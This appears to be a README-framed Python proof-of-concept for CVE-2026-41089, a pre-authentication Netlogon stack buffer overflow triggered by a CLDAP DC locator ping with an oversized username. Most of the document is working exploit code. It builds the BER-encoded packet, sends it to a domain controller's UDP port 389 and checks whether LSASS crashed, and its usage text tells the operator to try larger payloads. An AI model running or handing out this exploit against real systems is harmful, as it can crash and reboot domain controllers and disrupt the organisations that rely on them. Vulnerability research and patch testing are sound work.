README.md
Rendering markdown...
# DISCLAIMER: This proof-of-concept is provided for educational and authorized
# security research purposes only. The author(s) accept no responsibility or
# liability for any misuse, damage, or loss caused by the use of this code.
# Use at your own risk.
"""
CVE-2026-41089 PoC - Netlogon Stack Buffer Overflow via CLDAP Ping
===================================================================
Sends a CLDAP (Connectionless LDAP over UDP 389) DC locator ping request
with an oversized username to trigger a stack buffer overflow in
netlogon!NetpLogonPutUnicodeString -> netlogon!BuildSamLogonResponse.
The vulnerable code path:
I_NetLogonLdapLookupEx -> NlGetLocalPingResponse -> LogonRequestHandler
-> BuildSamLogonResponse -> NetpLogonPutUnicodeString
NlGetLocalPingResponse allocates a 528-byte stack buffer (Src[528]) and
passes it to BuildSamLogonResponse. BuildSamLogonResponse calls
NetpLogonPutUnicodeString multiple times to write Unicode strings into
this buffer without bounds checking.
The root cause: the maximum string length passed to NetpLogonPutUnicodeString
was interpreted as bytes but treated as WCHARs, doubling the effective write.
The "User" field in the CLDAP filter is attacker-controlled (up to 130 wchars).
Combined with server name, domain name, GUIDs, and DNS names, the total write
exceeds 528 bytes and overflows the stack.
Target: Windows Server 2012 through 2025 Domain Controllers (pre-patch)
Impact: LSASS crash -> DC reboot (~60 seconds). RCE possible but not demonstrated.
Attack vector: UDP port 389 (CLDAP), pre-authentication, no credentials needed
CVE: CVE-2026-41089, CVSS 9.8 CRITICAL, CWE-121
Published: May 12, 2026 by Microsoft (found internally)
"""
import argparse
import socket
import struct
import sys
import time
# ---------------------------------------------------------------------------
# BER/DER encoding primitives
# ---------------------------------------------------------------------------
def encode_ber_length(length):
"""Encode a BER length field (X.690 8.1.3)."""
if length < 0x80:
return bytes([length])
elif length < 0x100:
return bytes([0x81, length])
elif length < 0x10000:
return bytes([0x82, (length >> 8) & 0xFF, length & 0xFF])
else:
return bytes([0x83, (length >> 16) & 0xFF, (length >> 8) & 0xFF, length & 0xFF])
def encode_ber_int(value):
"""Encode a BER INTEGER (tag 0x02)."""
if value < 0:
raise ValueError(f"Negative integers not supported: {value}")
if value == 0:
payload = b'\x00'
elif value < 0x80:
payload = bytes([value])
elif value < 0x100:
# Leading zero to avoid high-bit being read as sign (X.690 8.3.2)
payload = bytes([0x00, value])
elif value < 0x10000:
payload = struct.pack('>H', value)
else:
payload = struct.pack('>I', value)
return bytes([0x02]) + encode_ber_length(len(payload)) + payload
def encode_ber_enum(value):
"""Encode a BER ENUMERATED (tag 0x0a)."""
if value < 0:
raise ValueError(f"Negative enum not supported: {value}")
if value == 0:
payload = b'\x00'
elif value < 0x80:
payload = bytes([value])
elif value < 0x100:
payload = bytes([0x00, value])
else:
payload = struct.pack('>H', value)
return bytes([0x0a]) + encode_ber_length(len(payload)) + payload
def encode_ber_string(tag, value):
"""Encode a tagged string (OCTET STRING, UTF8String, etc.)."""
if isinstance(value, str):
value = value.encode('utf-8')
return bytes([tag]) + encode_ber_length(len(value)) + value
def encode_ber_sequence(tag, contents):
"""Encode a SEQUENCE/SET with a given tag."""
return bytes([tag]) + encode_ber_length(len(contents)) + contents
# ---------------------------------------------------------------------------
# LDAP filter construction
# ---------------------------------------------------------------------------
def build_equality_filter(attr_name, attr_value):
"""Build an LDAP equalityMatch filter: (attr=value).
Tag 0xA3 = context class, constructed, tag number 3.
"""
attr_bytes = attr_name.encode('utf-8')
if isinstance(attr_value, str):
val_bytes = attr_value.encode('utf-8')
else:
val_bytes = attr_value
content = encode_ber_string(0x04, attr_bytes) + encode_ber_string(0x04, val_bytes)
return encode_ber_sequence(0xA3, content)
# ---------------------------------------------------------------------------
# CLDAP DC Locator Ping
# ---------------------------------------------------------------------------
def build_cldap_ping(target_domain, username, ntver=0x00000016):
"""Build a CLDAP DC locator ping (LDAP SearchRequest over UDP).
Filter: (&(DnsDomain=<domain>)(User=<username>)(NtVer=<ntver>))
Per MS-ADTS 6.3.3.2 / RFC 4511 Section 4.5.1.
"""
# NtVer: 4-byte little-endian flag
ntver_bytes = struct.pack('<I', ntver)
# AND filter (context tag 0xA0)
and_content = (
build_equality_filter("DnsDomain", target_domain)
+ build_equality_filter("User", username)
+ build_equality_filter("NtVer", ntver_bytes)
)
and_filter = encode_ber_sequence(0xA0, and_content)
# Requested attributes: ["Netlogon"]
attributes = encode_ber_sequence(0x30, encode_ber_string(0x04, "Netlogon"))
# SearchRequest fields (RFC 4511 Section 4.5.1, in order):
base_dn = encode_ber_string(0x04, "") # baseObject
scope = encode_ber_enum(0) # baseObject
deref = encode_ber_enum(0) # neverDerefAliases
size_limit = encode_ber_int(0) # no limit
time_limit = encode_ber_int(0) # no limit
types_only = bytes([0x01, 0x01, 0x00]) # BOOLEAN FALSE
search_body = (
base_dn + scope + deref + size_limit
+ time_limit + types_only + and_filter + attributes
)
# SearchRequest = APPLICATION 3 (tag 0x63)
search_request = encode_ber_sequence(0x63, search_body)
# LDAPMessage = SEQUENCE { messageID INTEGER, protocolOp SearchRequest }
ldap_message = encode_ber_sequence(0x30, encode_ber_int(1) + search_request)
return ldap_message
# ---------------------------------------------------------------------------
# Network I/O
# ---------------------------------------------------------------------------
def send_cldap_ping(target_ip, target_domain, username, port=389, timeout=5):
"""Send a CLDAP ping and wait for a response.
Returns the raw response bytes, or None on timeout/error.
"""
packet = build_cldap_ping(target_domain, username)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(timeout)
try:
sock.sendto(packet, (target_ip, port))
try:
data, addr = sock.recvfrom(4096)
return data
except socket.timeout:
return None
except OSError as e:
print(f"[-] Socket error: {e}", file=sys.stderr)
return None
finally:
sock.close()
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-41089 PoC - Netlogon CLDAP stack buffer overflow",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""\
examples:
%(prog)s 10.0.50.21 corp.local Normal ping (connectivity test)
%(prog)s 10.0.50.21 corp.local -l 130 Overflow attempt (default)
%(prog)s 10.0.50.21 corp.local -l 200 Larger overflow
%(prog)s 10.0.50.21 corp.local -l 130 -t 10 Longer timeout for slow networks
""",
)
parser.add_argument("target_ip", help="IP address of the Domain Controller")
parser.add_argument("domain_name", help="DNS domain name (e.g. corp.local)")
parser.add_argument(
"-l", "--length", type=int, default=130,
help="Username length in characters (default: 130)",
)
parser.add_argument(
"-t", "--timeout", type=int, default=5,
help="UDP recv timeout in seconds (default: 5)",
)
parser.add_argument(
"-d", "--delay", type=int, default=3,
help="Seconds to wait between phase 2 and phase 3 (default: 3)",
)
parser.add_argument(
"-p", "--port", type=int, default=389,
help="CLDAP port (default: 389)",
)
args = parser.parse_args()
if args.length < 1:
print("[-] Username length must be >= 1", file=sys.stderr)
sys.exit(1)
username = "A" * args.length
print("=" * 60)
print("CVE-2026-41089 - Netlogon Stack Buffer Overflow PoC")
print("=" * 60)
print()
print(f" Target: {args.target_ip}:{args.port}")
print(f" Domain: {args.domain_name}")
print(f" Username: {args.length} chars ({args.length * 2} bytes as UTF-16)")
print(f" Timeout: {args.timeout}s")
print()
# Phase 1: connectivity check
print("[1/3] Sending normal CLDAP ping (short username)...")
resp = send_cldap_ping(
args.target_ip, args.domain_name, "testuser",
port=args.port, timeout=args.timeout,
)
if resp is None:
print("[-] No response. DC is not reachable on UDP 389.")
print(" Verify the target is a domain controller and the port is open.")
sys.exit(1)
print(f"[+] DC responded ({len(resp)} bytes). Target is alive.")
print()
# Phase 2: send overflow
print(f"[2/3] Sending overflow payload (username={args.length} chars)...")
try:
resp = send_cldap_ping(
args.target_ip, args.domain_name, username,
port=args.port, timeout=args.timeout,
)
except KeyboardInterrupt:
print("\n[!] Interrupted.")
sys.exit(130)
if resp is None:
print("[!] No response. LSASS may have crashed.")
else:
print(f"[+] Got response ({len(resp)} bytes). Target processed the packet.")
# Give LSASS time to crash before the liveness check
print(f" Waiting {args.delay}s before liveness check...")
try:
time.sleep(args.delay)
except KeyboardInterrupt:
print("\n[!] Interrupted.")
sys.exit(130)
print()
# Phase 3: liveness check
print("[3/3] Liveness check...")
resp = send_cldap_ping(
args.target_ip, args.domain_name, "testuser",
port=args.port, timeout=args.timeout,
)
if resp is None:
print("[!] DC is not responding. LSASS likely crashed. Expect reboot in ~60s.")
else:
print(f"[+] DC responded ({len(resp)} bytes). Still alive.")
if args.length < 200:
print(f" Try a larger payload: -l {min(args.length + 50, 500)}")
if __name__ == "__main__":
main()